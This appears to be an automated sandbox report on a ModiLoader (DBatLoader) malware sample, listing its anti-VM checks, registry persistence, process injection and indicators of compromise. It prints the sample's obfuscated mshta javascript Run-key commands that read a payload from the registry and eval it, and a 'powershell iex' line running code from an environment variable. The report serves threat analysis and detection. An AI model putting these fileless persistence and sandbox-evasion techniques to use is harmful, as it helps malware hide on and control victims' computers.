max time kernel
156s -
max time network
162s -
windows7_x64 -
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
02/10/2022, 23:17
Static task
Behavioral task
Behavioral task
Malware Config
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1740 320 mshta.exe 26 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
description ioc Process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 11 IoCs
resource yara_rule behavioral1/memory/2032-56-0x0000000000400000-0x0000000000469000-memory.dmp modiloader_stage2 behavioral1/memory/2032-60-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/2032-62-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/680-65-0x0000000002300000-0x0000000002F4A000-memory.dmp modiloader_stage2 behavioral1/memory/680-66-0x0000000005C20000-0x0000000005CE0000-memory.dmp modiloader_stage2 behavioral1/memory/680-70-0x0000000005C20000-0x0000000005CE0000-memory.dmp modiloader_stage2 behavioral1/memory/960-72-0x0000000000290000-0x0000000000350000-memory.dmp modiloader_stage2 behavioral1/memory/1960-75-0x00000000001A0000-0x0000000000260000-memory.dmp modiloader_stage2 behavioral1/memory/2032-76-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/960-77-0x0000000000290000-0x0000000000350000-memory.dmp modiloader_stage2 behavioral1/memory/1960-78-0x00000000001A0000-0x0000000000260000-memory.dmp modiloader_stage2 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:vn6dfrr=\"pR4\";W8r=new%20ActiveXObject(\"WScript.Shell\");hLc8QPU7P=\"TbmG5\";M2Ypm=W8r.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\a3ad80ee84\\\\4b43b777\");BJ87rrUmlQ=\"KDDAlC\";eval(M2Ypm);gry7K2QPji=\"f\";" regsvr32.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
pid Process 960 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:hXsG8cO=\"vUmKS\";C65O=new%20ActiveXObject(\"WScript.Shell\");qopw0rqcv=\"z\";Nc6n6g=C65O.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\a3ad80ee84\\\\4b43b777\");WB8tMER1LI=\"X9SOt\";eval(Nc6n6g);VO7NRkd=\"Zs\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:icASqa7Y=\"JfhC2ex3MY\";LW3=new%20ActiveXObject(\"WScript.Shell\");XUV83EXd=\"FZeL3W\";X8AS7q=LW3.RegRead(\"HKCU\\\\software\\\\a3ad80ee84\\\\4b43b777\");TFbSzz6=\"1L0IE8Katz\";eval(X8AS7q);KAYt63lmc=\"J\";" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 680 powershell.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 680 powershell.exe 680 powershell.exe 680 powershell.exe 960 regsvr32.exe 960 regsvr32.exe 960 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 680 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1740 wrote to memory of 680 1740 mshta.exe 28 PID 1740 wrote to memory of 680 1740 mshta.exe 28 PID 1740 wrote to memory of 680 1740 mshta.exe 28 PID 1740 wrote to memory of 680 1740 mshta.exe 28 PID 680 wrote to memory of 960 680 powershell.exe 30 PID 680 wrote to memory of 960 680 powershell.exe 30 PID 680 wrote to memory of 960 680 powershell.exe 30 PID 680 wrote to memory of 960 680 powershell.exe 30 PID 680 wrote to memory of 960 680 powershell.exe 30 PID 680 wrote to memory of 960 680 powershell.exe 30 PID 680 wrote to memory of 960 680 powershell.exe 30 PID 960 wrote to memory of 1960 960 regsvr32.exe 31 PID 960 wrote to memory of 1960 960 regsvr32.exe 31 PID 960 wrote to memory of 1960 960 regsvr32.exe 31 PID 960 wrote to memory of 1960 960 regsvr32.exe 31 PID 960 wrote to memory of 1960 960 regsvr32.exe 31 PID 960 wrote to memory of 1960 960 regsvr32.exe 31 PID 960 wrote to memory of 1960 960 regsvr32.exe 31
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:eCNvb12jh="OnBFJEp";V3H5=new%20ActiveXObject("WScript.Shell");bqFHBk9="lMhB4gmU";nW14yN=V3H5.RegRead("HKLM\\software\\Wow6432Node\\TVRGxa\\AKU4xTrMl");VeVQ4AnT="jVsxIrSv";eval(nW14yN);Opl9bqx="ZX";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xwoggrbm2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:680 -
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Adds policy Run key to start application
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:960 -